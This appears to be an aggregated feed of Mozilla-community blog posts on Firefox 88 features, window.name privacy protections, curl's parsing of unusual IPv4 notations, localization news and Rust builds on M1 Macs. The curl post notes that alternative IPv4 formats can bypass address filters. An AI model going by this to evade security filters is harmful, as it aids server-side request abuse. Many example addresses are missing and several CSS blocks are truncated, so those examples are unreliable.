Mark has demonstrated his commitment to Mozilla as a whole, over and over. The whole of Mozilla figures into his strategic thinking. He’s got a good sense of how Mozilla Foundation and Mozilla Corporation can magnify or reduce the effectiveness of Mozilla overall. Mark has a hunger for Mozilla to grow in impact. He has demonstrated an ability to think big, and to dive into the work that is in front of us today.

For those of you who don’t know Mark already, he brings over two decades of experience leading projects and organizations focused on the public interest side of the internet. In the 12 years since Mark joined Mozilla, he has built the Foundation into a leading philanthropic and advocacy voice championing the health of the internet. Prior to Mozilla, Mark spent 15 years working on everything from a non-profit internet provider to an early open source content management system to a global network of community-run cybercafes. Currently, Mark spends most of his time on Mozilla’s efforts to promote trustworthy AI in the tech industry, a major focus of the Foundation’s current efforts.
Please join me in welcoming Mark Surman to the Mozilla Foundation Board of Directors.

You can read Mark’s message about why he’s joining Mozilla here.

PS. As always, we continue to look for new members for both boards, with the goal of adding the skills, networks and diversity Mozilla will need to succeed in the future.

LinkedIn: https://www.linkedin.com/in/msurman/

The post Mark Surman joins the Mozilla Foundation Board of Directors appeared first on The Mozilla Blog.

The Mozilla BlogWearing more (Mozilla) hats

Mark Surman

For many years now — and well before I sought out the job I have today — I thought: the world needs more organizations like Mozilla. Given the state of the internet, it needs them now. And, it will likely need them for a very long time to come.

Why? In part because the internet was founded with public benefit in mind. And, as the Mozilla Manifesto declared back in 2007, “… (m)agnifying the public benefit aspects of the internet is an important goal, worthy of time, attention and commitment.”

Today, this sort of ‘time and attention’ is more important — and urgent — than ever. We live in an era where the biggest companies in the world are internet companies. Much of what they have created is good, even delightful. Yet, as the last few years have shown, leaving things to commercial actors alone can leave the internet — and society — in a bit of a mess. We need organizations like Mozilla — and many more like it — if we are to find our way out of this mess. And we need these organizations to think big!

It’s for this reason that I’m excited to add another ‘hat’ to my work: I am joining the Mozilla Foundation board today. This is something I will take on in addition to my role as executive director.

Why am I assuming this additional role? I believe Mozilla can play a bigger role in the world than it does today. And, I also believe we can inspire and support the growth of more organizations that share Mozilla’s commitment to the public benefit side of the internet. Wearing a board member hat — and working with other Foundation and Corporation board members — I will be in a better position to turn more of my attention to Mozilla’s long term impact and sustainability.

What does this mean in practice? It means spending some of my time on big picture ‘Pan Mozilla’ questions. How can Mozilla connect to more startups, developers, designers and activists who are trying to build a better, more humane internet? What might Mozilla develop or do to support these people? How can we work with policy makers who are trying to write regulations to ensure the internet benefits the public interest? And, how do we shift our attention and resources outside of the US and Europe, where we have traditionally focused? While I don’t have answers to all these questions, I do know we urgently need to ask them — and that we need to do so in an expansive way that goes beyond the current scope of our operating organizations. That’s something I’ll be well positioned to do wearing my new board member hat.

Of course, I still have much to do wearing my executive director hat. We set out a few years ago to evolve the Foundation into a ‘movement building arm’ for Mozilla. Concretely, this has meant building up teams with skills in philanthropy and advocacy who can rally more people around the cause of a healthy internet. And, it has meant picking a topic to focus on: trustworthy AI. Our movement building approach — and our trustworthy AI agenda — is getting traction. Yet, there is still a way to go to unlock the kind of sustained action and impact that we want. Leading the day to day side of this work remains my main focus at Mozilla.

As I said at the start of this post: I think the world will need organizations like Mozilla for a long time to come. As all corners of our lives become digital, we will increasingly need to stand firm for public interest principles like keeping the internet open and accessible to all. While we can all do this as individuals, we also need strong, long lasting organizations that can take this stand in many places and over many decades. Whatever hat I’m wearing, I continue to be deeply committed to building Mozilla into a vast, diverse and sustainable institution to do exactly this.

The post Wearing more (Mozilla) hats appeared first on The Mozilla Blog.

Karl DubostGet Ready For Three Digits User Agent Strings

In 2022, Firefox and Chrome will reach a version number with three digits: 100. It's time to get ready and extensively test your code, so your code doesn't return null or worse 10 instead of 100.

Durian on sale

Some contexts

The browser user agent string is used in many circumstances, on the server side with the User-Agent HTTP header and on the client side with navigator.userAgent. Browsers lie about it. Web apps and websites detection do not cover all cases. So browsers have to modify the user agent string on a site by site case.

Browsers Release Calendar

According to the Firefox release calendar, during the first quarter of 2022 (probably February), Firefox will reach version 100.

And Chrome release calendar sets a current date of March 29, 2022.

What Mozilla Webcompat Team is doing?

Dennis Schubert started to test JavaScript Libraries, but this tests only the libraries which are up to date. And we know it, the Web is a legacy machine full of history.

The webcompat team will probably automatically test the top 1000 websites. But this is very rudimentary. It will not cover everything. Sites always break in strange ways.

What Can You Do To Help?

Browse the Web with a 100 UA string

  1. Change the user agent string of your favorite browser. For example, if the string is Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0, change it to be Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
  2. If you notice something that is breaking because of the UA string, file a report on webcompat. Do not forget to check that it is working with the normal UA string.

Automatic tests for your code

If your web app has a JavaScript Test suite, add a profile with a browser having 100 for its version number and check if it breaks. Test both Firefox and Chrome (mobile and desktop) because the libraries have different code paths depending on the user agent. Watch out for code like:

const ua_string = "Firefox/100.0";
ua_string.match(/Firefox\/(\d\d)/); //  ["Firefox/10", "10"]
ua_string.match(/Firefox\/(\d{2})/); // ["Firefox/10", "10"]
ua_string.match(/Firefox\/(\d\d)\./); //  null

Compare version numbers as integer not string

Compare integer, not string when you have decided to have a minimum version for supporting a browser, because

"80" < "99" // true
"80" < "100" // false
parseInt("80", 10) < parseInt("99", 10) // true
parseInt("80", 10) < parseInt("100", 10) // true


If you have more questions, things I may have missed, different take on them. Feel free to comment…. Be mindful.


Mozilla Privacy BlogMozilla Mornings on the DSA: Setting the standard for third-party platform auditing

On 11 May, Mozilla will host the next instalment of Mozilla Mornings – our regular event series that brings together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

This instalment will focus on the DSA’s provisions on third-party platform auditing, one of the stand-out features of its next-generation regulatory approach. We’re bringing together a panel of experts to unpack the provisions’ strengths and shortcomings; and to provide recommendations for how the DSA can build a standard-setting auditing regime for Very Large Online Platforms.


Alexandra Geese MEP
IMCO DSA shadow rapporteur
Group of the Greens/European Free Alliance

Amba Kak
Director of Global Programs and Policy
AI Now Institute

Dr Ben Wagner
Assistant Professor, Faculty of Technology, Policy and Management
TU Delft  

With opening remarks by Raegan MacDonald
Director of Global Public Policy

Moderated by Jennifer Baker
EU technology journalist


Logistical details

Tuesday 11 May, 14:00 – 15:00 CEST

Zoom Webinar

Register *here*

Webinar login details to be shared on day of event

The post Mozilla Mornings on the DSA: Setting the standard for third-party platform auditing appeared first on Open Policy & Advocacy.

Hacks.Mozilla.OrgNever too late for Firefox 88

April is upon us, and we have a most timely release for you — Firefox 88. In this release you will find a bunch of nice CSS additions including :user-valid and :user-invalid support and image-set() support, support for regular expression match indices, removal of FTP protocol support for enhanced security, and more!

This blog post provides merely a set of highlights; for all the details, check out the following:

:user-valid and :user-invalid

There are a large number of HTML form-related pseudo-classes that allow us to specify styles for various data validity states, as you’ll see in our UI pseudo-classes tutorial. Firefox 88 introduces two more — :user-valid and :user-invalid.

You might be thinking “we already have :valid and :invalid for styling forms containing valid or invalid data — what’s the difference here?”

:user-valid and :user-invalid are similar, but have been designed with better user experience in mind. They effectively do the same thing — matching a form input that contains valid or invaid data — but :user-valid and :user-invalid only start matching after the user has stopped focusing on the element (e.g. by tabbing to the next input). This is a subtle but useful change, which we will now demonstrate.

Take our valid-invalid.html example. This uses the following CSS to provide clear indicators as to which fields contain valid and invalid data:

input:invalid {
  border: 2px solid red;

input:invalid + span::before {
  content: '✖';
  color: red;

input:valid + span::before {
  content: '✓';
  color: green;

The problem with this is shown when you try to enter data into the “E-mail address” field — as soon as you start typing an email address into the field the invalid styling kicks in, and remains right up until the point where the entered text constitutes a valid e-mail address. This experience can be a bit jarring, making the user think they are doing something wrong when they aren’t.

Now consider our user-valid-invalid.html example. This includes nearly the same CSS, except that it uses the newer :user-valid and :user-invalid pseudo-classes:

input:user-invalid {
  border: 2px solid red;

input:user-invalid + span::before {
  content: '✖';
  color: red;

input:user-valid + span::before {
  content: '✓';
  color: green;

In this example the valid/invalid styling only kicks in when the user has entered their value and removed focus from the input, giving them a chance to enter their complete value before receiving feedback. Much better!

Note: Previously to Firefox 88, the same effect could be achieved using the proprietary :-moz-ui-invalid and :-moz-ui-valid pseudo-classes.

image-set() support for content/cursor

The image-set() function provides a mechanism in CSS to allow the browser to pick the most suitable image for the device’s resolution from a list of options, in a similar manner to the HTML srcset attribute. For example, the following can be used to provide multiple background-images to choose from:

div {
  background-image: image-set(
    url("small-balloons.jpg") 1x,
    url("large-balloons.jpg") 2x);

Firefox 88 has added support for image-set() as a value of the content and cursor properties. So for example, you could provide multiple resolutions for generated content:

h2::before {
  content: image-set(
    url("small-icon.jpg") 1x,
    url("large-icon.jpg") 2x);

or custom cursors:

div {
  cursor: image-set(
    url("custom-cursor-small.png") 1x,
    url("custom-cursor-large.png") 2x),

outline now follows border-radius shape

The outline CSS property has been updated so that it now follows the outline shape created by border-radius. It is really nice to see a fix included in Firefox for this long standing problem. As part of this work the non-standard -moz-outline-radius property has been removed.

RegExp match indices

Firefox 88 supports the match indices feature of regular expressions, which makes an indices property available containing an array that stores the start and end positions of each matched capture group. This functionality is enabled using the d flag.

There is also a corresponding hasIndices boolean property that allows you to check whether a regex has this mode enabled.

So for example:

const regex1 = new RegExp('foo', 'd');
regex1.hasIndices // true
const test = regex1.exec('foo bar');
test // [ "foo" ]
test.indices // [ [ 0, 3 ] ]

For more useful information, see our RegExp.prototype.exec() page, and RegExp match indices on the V8 dev blog.

FTP support disabled

FTP support has been disabled from Firefox 88 onwards, and its full removal is (currently) planned for Firefox version 90. Addressing this security risk reduces the likelihood of an attack while also removing support for a non-encrypted protocol.

Complementing this change, the extension setting browserSettings.ftpProtocolEnabled has been made read-only, and web extensions can now register themselves as protocol handlers for FTP.

The post Never too late for Firefox 88 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Addons BlogChanges to themeable areas of Firefox in version 89

Firefox’s visual appearance will be updated in version 89 to provide a cleaner, modernized interface. Since some of the changes will affect themeable areas of the browser, we wanted to give theme artists a preview of what to expect as the appearance of their themes may change when applied to version 89.

Tabs appearance

  • The property tab_background_separator, which controls the appearance of the vertical lines that separate tabs, will no longer be supported.
  • Currently, the tab_line property can set the color of an active tab’s thick top border. In Firefox 89, this property will set a color for all borders of an active tab, and the borders will be thinner.

URL and toolbar

  • The property toolbar_field_separator, which controls the color of the vertical line that separates the URL bar from the three-dot “meatball menu,” will no longer be supported.

  • The property toolbar_vertical_separator, which controls the vertical lines near the three-line “hamburger menu” and the line separating items in the bookmarks toolbar, will no longer appear next to the hamburger menu. You can still use this property to control the separators in the bookmarks toolbar.  (Note: users will need to enable the separator by right clicking on the bookmarks toolbar and selecting “Add Separator.”)

You can use the Nightly pre-release channel to start testing how your themes will look with Firefox 89. If you’d like to get more involved testing other changes planned for this release, please check out our foxfooding campaign, which runs until May 3, 2021.

Firefox 89 is currently set available on the Beta pre-release channel by April 23, 2021, and released on June 1, 2021.

As always, please post on our community forum if there are any questions.

The post Changes to themeable areas of Firefox in version 89 appeared first on Mozilla Add-ons Blog.

Daniel StenbergMars 2020 Helicopter Contributor

Friends of mine know that I’ve tried for a long time to get confirmation that curl is used in space. We’ve believed it to be likely but I’ve wanted to get a clear confirmation that this is indeed the fact.

Today GitHub posted their article about open source in the Mars mission, and they now provide a badge on their site for contributors of projects that are used in that mission.

I have one of those badges now. Only a few other of the current 879 recorded curl authors got it. Which seems to be due to them using a very old curl release (curl 7.19, released in September 2008) and they couldn’t match all contributors with emails or the authors didn’t have their emails verified on GitHub etc.

According to that GitHub blog post, we are “almost 12,000” developers who got it.

While this strictly speaking doesn’t say that curl is actually used in space, I think it can probably be assumed to be.

Here’s the interplanetary curl development displayed in a single graph:

See also: screenshotted curl credits and curl supports NASA.


Image by Aynur Zakirov from Pixabay

Mozilla Security BlogFirefox 88 combats window.name privacy abuses

We are pleased to announce that Firefox 88 is introducing a new protection against privacy leaks on the web. Under new limitations imposed by Firefox, trackers are no longer able to abuse the window.name property to track users across websites.

Since the late 1990s, web browsers have made the window.name property available to web pages as a place to store data. Unfortunately, data stored in window.name has been allowed by standard browser rules to leak between websites, enabling trackers to identify users or snoop on their browsing history. To close this leak, Firefox now confines the window.name property to the website that created it.

Leaking data through window.name

The window.name property of a window allows it to be able to be targeted by hyperlinks or forms to navigate the target window. The window.name property, available to any website you visit, is a “bucket” for storing any data the website may choose to place there. Historically, the data stored in window.name has been exempt from the same-origin policy enforced by browsers that prohibited some forms of data sharing between websites. Unfortunately, this meant that data stored in the window.name property was allowed by all major browsers to persist across page visits in the same tab, allowing different websites you visit to share data about you.

For example, suppose a page at https://example.com/ set the window.name property to “my-identity@email.com”. Traditionally, this information would persist even after you clicked on a link and navigated to https://malicious.com/. So the page at https://malicious.com/ would be able to read the information without your knowledge or consent:

Window.name persists across the cross-origin navigation.

Window.name persists across the cross-origin navigation.

Tracking companies have been abusing this property to leak information, and have effectively turned it into a communication channel for transporting data between websites. Worse, malicious sites have been able to observe the content of window.name to gather private user data that was inadvertently leaked by another website.

Clearing window.name to prevent leakage

To prevent the potential privacy leakage of window.name, Firefox will now clear the window.name property when you navigate between websites. Here’s how it looks:

Firefox 88 clearing window.name after cross-origin navigation.

Firefox 88 clearing window.name after cross-origin navigation.

Firefox will attempt to identify likely non-harmful usage of window.name and avoid clearing the property in such cases. Specifically, Firefox only clears window.name if the link being clicked does not open a pop-up window.

To avoid unnecessary breakage, if a user navigates back to a previous website, Firefox now restores the window.name property to its previous value for that website. Together, these dual rules for clearing and restoring window.name data effectively confine that data to the website where it was originally created, similar to how Firefox’s Total Cookie Protection confines cookies to the website where they were created. This confinement is essential for preventing malicious sites from abusing window.name to gather users’ personal data.

Firefox isn’t alone in making this change: web developers relying on window.name should note that Safari is also clearing the window.name property, and Chromium-based browsers are planning to do so. Going forward, developers should expect clearing to be the new standard way that browsers handle window.name.

If you are a Firefox user, you don’t have to do anything to benefit from this new privacy protection. As soon as your Firefox auto-updates to version 88, the new default window.name data confinement will be in effect for every website you visit. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect your privacy.

The post Firefox 88 combats window.name privacy abuses appeared first on Mozilla Security Blog.

Daniel Stenbergcurl those funny IPv4 addresses

Everyone knows that on most systems you can specify IPv4 addresses just 4 decimal numbers separated with periods (dots). Example:

Useful when you for example want to ping your local wifi router and similar. “ping”

Other bases

The IPv4 string is usually parsed by the inet_addr() function or at times it is passed straight into the name resolver function like getaddrinfo().

This address parser supports more ways to specify the address. You can for example specify each number using either octal or hexadecimal.

Write the numbers with zero-prefixes to have them interpreted as octal numbers:


Write them with 0x-prefixes to specify them in hexadecimal:


You will find that ping can deal with all of these.

As a 32 bit number

An IPv4 address is a 32 bit number that when written as 4 separate numbers are split in 4 parts with 8 bits represented in each number. Each separate number in “a.b.c.d” is 8 bits that combined make up the whole 32 bits. Sometimes the four parts are called quads.

The typical IPv4 address parser however handles more ways than just the 4-way split. It can also deal with the address when specified as one, two or three numbers (separated with dots unless its just one).

If given as a single number, it treats it as a single unsigned 32 bit number. The top-most eight bits stores what we “normally” with write as the first number and so on. The address shown above, if we keep it as hexadecimal would then become:


And you can of course write it in octal as well:


and plain old decimal:


As two numbers

If you instead write the IP address as two numbers with a dot in between, the first number is assumed to be 8 bits and the next one a 24 bit one. And you can keep on mixing the bases as you see like. The same address again, now in a hexadecimal + octal combo:


This allows for some fun shortcuts when the 24 bit number contains a lot of zeroes. Like you can shorten “” to just “127.1” and it still works and is perfectly legal.

As three numbers

Now the parts are supposed to be split up in bits like this: 8.8.16. Here’s the example address again in octal, hex and decimal:


Bypassing filters

All of these versions shown above work with most tools that accept IPv4 addresses and sometimes you can bypass filters and protection systems by switching to another format so that you don’t match the filters. It has previously caused problems in node and perl packages and I’m guessing numerous others. It’s a feature that is often forgotten, ignored or just not known.

It begs the question why this very liberal support was once added and allowed but I’ve not been able to figure that out – maybe because of how it matches class A/B/C networks. The support for this syntax seems to have been introduced with the inet_aton() function in the 4.2BSD release in 1983.

IPv4 in URLs

URLs have a host name in them and it can be specified as an IPv4 address.

RFC 3986

The RFC 3986 URL specification’s section 3.2.2 says an IPv4 address must be specified as:

dec-octet "." dec-octet "." dec-octet "." dec-octet

… but in reality very few clients that accept such URLs actually restrict the addresses to that format. I believe mostly because many programs will pass on the host name to a name resolving function that itself will handle the other formats.


The Host Parsing section of this spec allows the many variations of IPv4 addresses. (If you’re anything like me, you might need to read that spec section about three times or so before that’s clear).

Since the browsers all obey to this spec there’s no surprise that browsers thus all allow this kind of IP numbers in URLs they handle.

curl before

curl has traditionally been in the camp that mostly accidentally somewhat supported the “flexible” IPv4 address formats. It did this because if you built curl to use the system resolver functions (which it does by default) those system functions will handle these formats for curl. If curl was built to use c-ares (which is one of curl’s optional name resolver backends), using such address formats just made the transfer fail.

The drawback with allowing the system resolver functions to deal with the formats is that curl itself then works with the original formatted host name so things like HTTPS server certificate verification and sending Host: headers in HTTP don’t really work the way you’d want.

curl now

Starting in curl 7.77.0 (since this commit ) curl will “natively” understand these IPv4 formats and normalize them itself.

There are several benefits of doing this ourselves:

  1. Applications using the URL API will get the normalized host name out.
  2. curl will work the same independently of selected name resolver backend
  3. HTTPS works fine even when the address is using other formats
  4. HTTP virtual hosts headers get the “correct” formatted host name

Fun example command line to see if it works:

curl -L 16843009

16843009 gets normalized to which then gets used as (because curl will assume HTTP for this URL when no scheme is used) which returns a 301 redirect over to which -L makes curl follow…


Image by Thank you for your support Donations welcome to support from Pixabay

Niko MatsakisAsync Vision Doc Writing Sessions VI

Ryan Levick and I are going to be hosting more Async Vision Doc Writing Sessions this week. We’re not organized enough to have assigned topics yet, so I’m just going to post the dates/times and we’ll be tweeting about the particular topics as we go.

When Who
Wed at 07:00 ET Ryan
Wed at 15:00 ET Niko
Fri at 07:00 ET Ryan
Fri at 14:00 ET Niko

If you’ve joined before, we’ll be re-using the same Zoom link. If you haven’t joined, then send a private message to one of us and we’ll share the link. Hope to see you there!

Cameron KaiserTenFourFox FPR32 available, plus a two-week reprieve

TenFourFox Feature Parity Release 32 final is now available for testing (downloads, hashes, release notes). This adds an additional entry to the ATSUI font blocklist and completes the outstanding security patches. Assuming no issues, it will go live as the final FPR on or about April 19.

Mozilla is advancing Firefox 89 by two weeks to give them additional time to polish up the UI changes in that version. This will thus put all future release dates ahead by two weeks as well; the next ESR release and the first Security Parity Release parallel with it instead will be scheduled for June 1. Aligning with this, the testing version of FPR32 SPR1 will come out the weekend before June 1 and the final official build of TenFourFox will also move ahead two weeks, from September 7 to September 21. After that you'll have to DIY but fortunately it already looks like people are rising to the challenge of building the browser themselves: I have been pointed to an installer which neatly wraps up all the necessary build prerequisites, provides a guided Automator workflow and won't interfere with any existing installation of MacPorts. I don't have anything to do this with this effort and can't attest to or advise on its use, but it's nice to see it exists, so download it from Macintosh Garden if you want to try it out. Remember, compilation speed on G4 (and, shudder, G3) systems can be substantially slower than on a G5, and especially without multiple CPUs. Given this Quad G5 running full tilt (three cores dedicated to compiling) with a full 16GB of RAM takes about three and a half hours to kick out a single architecture build, you should plan accordingly for longer times on lesser systems.

I have already started clearing issues from Github I don't intend to address. The remaining issues may not necessarily be addressed either, and definitely won't be during the security parity period, but they are considerations for things I might need later. Don't add to this list: I will mark new issues without patches or PRs as invalid. I will also be working on revised documentation for Tenderapp and the main site so people are aware of the forthcoming plan; those changes will be posted sometime this coming week.

Hacks.Mozilla.OrgQUIC and HTTP/3 Support now in Firefox Nightly and Beta

tl;dr: Support for QUIC and HTTP/3 is now enabled by default in Firefox Nightly and Firefox Beta. We are planning to start rollout on the release in Firefox Stable Release 88. HTTP/3 will be available by default by the end of May.

What is HTTP/3?

HTTP/3 is a new version of HTTP (the protocol that powers the Web) that is based on QUIC. HTTP/3 has three main performance improvements over HTTP/2:

  • Because it is based on UDP it takes less time to connect;
  • It does not have head of line blocking, where delays in delivering packets cause an entire connection to be delayed; and
  • It is better able to detect and repair packet loss.

QUIC also provides connection migration and other features that should improve performance and reliability. For more on QUIC, see this excellent blog post from Cloudflare.

How to use it?

Firefox Nightly and Firefox Beta will automatically try to use HTTP/3 if offered by the Web server (for instance, Google or Facebook). Web servers can indicate support by using the Alt-Svc response header or by advertising HTTP/3 support with a HTTPS DNS record. Both the client and server must support the same QUIC and HTTP/3 draft version to connect with each other. For example, Firefox currently supports drafts 27 to 32 of the specification, so the server must report support of one of these versions (e.g., “h3-32”) in Alt-Svc or HTTPS record for Firefox to try to use QUIC and HTTP/3 with that server. When visiting such a website, viewing the network request information in Dev Tools should show the Alt-Svc header, and also indicate that HTTP/3 was used.

If you encounter issues with these or other sites, please file a bug in Bugzilla.

The post QUIC and HTTP/3 Support now in Firefox Nightly and Beta appeared first on Mozilla Hacks - the Web developer blog.

About:CommunityNew Contributors To Firefox

With Firefox 88 in flight, we are pleased to welcome the long list of developers who’ve contributed their first code change to in this release, 24 of whom were brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Mozilla Localization (L10N)L10n Report: April 2021 Edition

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 


New localizers

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

  • Cebuano (ceb)
  • Hiligaynon (hil)
  • Meiteilon (mni)
  • Papiamento (pap-AW)
  • Shilha (shi)
  • Somali (so)
  • Uyghur (ug)

Update on the communication channels

On April 3rd, as part of a broader strategy change at Mozilla, we moved our existing mailing lists (dev-l10n, dev-l10n-web, dev-l10n-new-locales) to Discourse. If you are involved in localization, please make sure to create an account on Discourse and set up your profile to receive notifications when there are new messages in the Localization category.

We also decided to shut down our existing Telegram channel dedicated to localization. This was originally created to fill a gap, given its broad availability on mobile, and the steep entry barrier required to use IRC. In the meantime, IRC has been replaced by chat.mozilla.org, which offers a much better experience on mobile platforms. Please make sure to check out the dedicated Wiki page with instructions on how to connect, and join our #l10n-community room.

New content and projects

What’s new or coming up in Firefox desktop

For all localizers working on Firefox, there is now a Firefox L10n Newsletter, including all information regarding the next major release of Firefox (89, aka MR1). Here you can find the latest issue, and you can also subscribe to this thread in discourse to receive a message every time there’s an update.

One important update is that the Firefox 89 cycle will last 2 extra weeks in Beta. These are the important deadlines:

  • Firefox 89 will move from Nightly to Beta on April 19 (unchanged).
  • It will be possible to update localizations for Firefox 89 until May 23 (previously May 9).
  • Firefox 89 will be released on June 1.

As a consequence, the Nightly cycle for Firefox 90 will also be two weeks longer.

What’s new or coming up in mobile

Like Firefox desktop, Firefox for iOS and Firefox for Android are still on the road to the MR1 release. I’ve published some details on Discourse here. Dates and info are still relevant, nothing changes in terms of l10n.

All strings for Firefox for iOS should already have landed.

Most strings for Firefox for Android should have landed.

What’s new or coming up in web projects


The Voice Fill and Firefox Voice Beta extensions are being retired.

Common Voice:

The project is transitioning to Mozilla Foundation. The announcement was made earlier this week. Some of the Mozilla staff who worked closely with the project will continue working on it in their new roles. The web part, the part that contributes to the site localization will remain in Pontoon.

Firefox Accounts:

Beta was launched on March 17. The sprint cycle is now aligned with Firefox Nightly moving forward. The next code push will be on April 21. The cutoff to include localized strings is a week earlier than the code push date.


All locales are disabled with the exception of fr, ja, zh-CN and zh-TW. There is a blog on this decision. The team may add back more languages later. If it does happen, the attributes to the work done by community members will be retained in Pontoon. Nothing will be lost.

  • Migration from .lang to .ftl has completed. The strings containing brand and product names that were not converted properly will appear as warnings and would not be shown on the production site. Please resolve these issues as soon as possible.
  • A select few locales are chosen to be supported by vendor service: ar, hi-IN, id, ja, and ms. The community managers were reached out for this change. The website should be fully localized in these languages by the first week of May. For more details on this change and for ways to report translation issues, please check out the announcement on Discourse.


  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Jan-Erik RedigerThis Week in Glean: rustc, iOS and an M1

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.

Back in February I got an M1 MacBook. That's Apple's new ARM-based hardware.

I got it with the explicit task to ensure that we are able to develop and build Glean on it. We maintain a Swift language binding, targeting iOS, and that one is used in Firefox iOS. Eventually these iOS developers will also have M1-based machines and want to test their code, thus Glean needs to work.

Here's what we need to get to work:

  • Compile the Rust portions of Glean natively on an M1 machine
  • Build & test the Kotlin & Swift language bindings on an M1 machine, even if non-native (e.g. Rosetta 2 emulation for x86_64)
  • Build & test the Swift language bindings natively and in the iPhone simulator on an M1 machine
  • Stretch goal: Get iOS projects using Glean running as well

Rust on an M1

Work on getting Rust compiled on M1 hardware started last year in June already, with the availability of the first developer kits. See Rust issue 73908 for all the work and details. First and foremost this required a new target: aarch64-apple-darwin. This landed in August and was promoted to Tier 21 with the December release of Rust 1.49.0.

By the time I got my MacBook compiling Rust code on it was as easy as on an Intel MacBook. Developers on Intel MacBooks can cross-compile just as easily:

rustup target add aarch64-apple-darwin
cargo build --target aarch64-apple-darwin

Glean Python & Kotlin on an M1

Glean Python just ... worked. We use cffi to load the native library into Python. It gained aarch642 macOS support in v14.4.1. My colleague glandium later contributed support code so we build release wheels for that target too. So it's both possible to develop & test Glean Python, as well as use it as a dependency without having a full Rust development environment around.

Glean Android is not that straight forward. Some of our transitive dependencies are based on years-old pre-built binaries of SQLite and of course there's not much support behind updating those Java libraries. It's possible. A friend managed to compile and run that library on an M1. But for Glean development we simply recommend relying on Rosetta 2 (the x86_64 compatibility layer) for now. It's as easy as:

arch -x86_64 $SHELL
make build-kotlin

At least if you have Java set up correctly... The default Android emulator isn't usable on M1 hardware yet, but Google is working on a compatible one: Android M1 emulator preview. It's usable enough for some testing, but for that part I most often switch back to my Linux Desktop (that has the additional CPU power on top).

Glean iOS on an M1

Now we're getting to the interesting part: Native iOS development on an M1. Obviously for Apple this is a priority: Their new machines should become the main machine people do iOS development on. Thus Xcode gained aarch64 support in version 12 long before the hardware was available. That caused quite some issues with existing tooling, such as the dependency manager Carthage. Here's the issue:

  • When compiling for iOS hardware you would pick a target named aarch64-apple-ios, because ... iPhones and iPads are ARM-based since forever.
  • When compiling for the iOS simulator you would pick a target named x86_64-apple-ios, because conveniently the simulator uses the host's CPU (that's what makes it fast)

So when the compiler saw x86_64 and iOS it knew "Ah, simulator target" and when it saw aarch64 and ios it knew "Ah, hardware". And everyone went with this, Xcode happily built both targets and, if asked to, was able to bundle them into one package.

With the introduction of Apple Silicion3 the iOS simulator run on these machines would also be aarch644, and also contain ios, but not be for the iOS hardware.

Now Xcode and the compiler will get confused what to put where when building on M1 hardware for both iOS hardware and the host architecture.

So the compiler toolchain gained knowledge of a new thing: arm64-apple-ios14.0-simulator, explicitly marking the simulator target. The compiler knows from where to pick the libraries and other SDK files when using that target. You still can't put code compiled for arm64-apple-ios and arm64-apple-ios14.0-simulator into the same universal binary5, because you can have each architecture only once (the arm64 part in there). That's what Carthage and others stumbled over.

Again Apple prepared for that and for a long time they have wanted you to use XCFramework bundles6. Carthage just didn't used to support that. The 0.37.0 release fixed that.

That still leaves Rust behind, as it doesn't know the new -simulator target. But as always the Rust community is ahead of the game and deg4uss3r started adding a new target in Rust PR #81966. He got half way there when I jumped in to push it over the finish line. How these targets work and how LLVM picks the right things to put into the compiled artifacts is severly underdocumented, so I had to go the trial-and-error route in combination with looking at LLVM source code to find the missing pieces. Turns out: the 14.0 in arm64-apple-ios14.0-simulator is actually important.

With the last missing piece in place, the new Rust target landed in February and is available in Nightly. Contrary to the main aarch64-apple-darwin or aarch64-apple-ios target, the simulator target is not Tier 2 yet and thus no prebuilt support is available. rustup target add aarch64-apple-darwin does not work right now. I am now in discussions to promote it to Tier 2, but it's currently blocked by the RFC: Target Tier Policy.

It works on nightly however and in combination with another cargo capability I'm able to build libraries for the M1 iOS simulator:

cargo +nightly build -Z build-std --target aarch64-apple-ios-sim

For now Glean iOS development on an M1 is possible, but requires Nightly. Goal achieved, I can actually work with this!

In a future blog post I want to explain in more detail how to teach Xcode about all the different targets it should build native code for.

All The Other Projects

This was marked a stretch goal for a reason. This involves all the other teams with Rust code and the iOS teams too. We're not there yet and there's currently no explicit priority to make development of Firefox iOS on M1 hardware possible. But when it comes to it, Glean will be ready for it and the team can assist others to get it over the finish line.

Want to hear more about Glean and our cross-platform Rust development? Come to next week's Rust Linz meetup, where I will be talking about this.



See Platform Support for what the Tiers means.
2: The other name for that target.
3: "Apple Silicon" is yet another name for what is essentially the same as "M1" or "macOS aarch64"
4: Or arm64 for that matter. Yes, yet another name for the same thing.
5: "Universal Binaries" have existed for a long time now and allow for one binary to include the compiled artifacts for multiple targets. It's how there's only one Firefox for Mac download which runs natively on either Mac platform.
6: Yup, the main documentation they link to is a WWDC 2019 talk recording video.

Data@MozillaThis Week in Glean: rustc, iOS and an M1

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog).

Back in February I got an M1 MacBook. That’s Apple’s new ARM-based hardware.

I got it with the explicit task to ensure that we are able to develop and build Glean on it. We maintain a Swift language binding, targeting iOS, and that one is used in Firefox iOS. Eventually these iOS developers will also have M1-based machines and want to test their code, thus Glean needs to work.

Here’s what we need to get to work:

  • Compile the Rust portions of Glean natively on an M1 machine
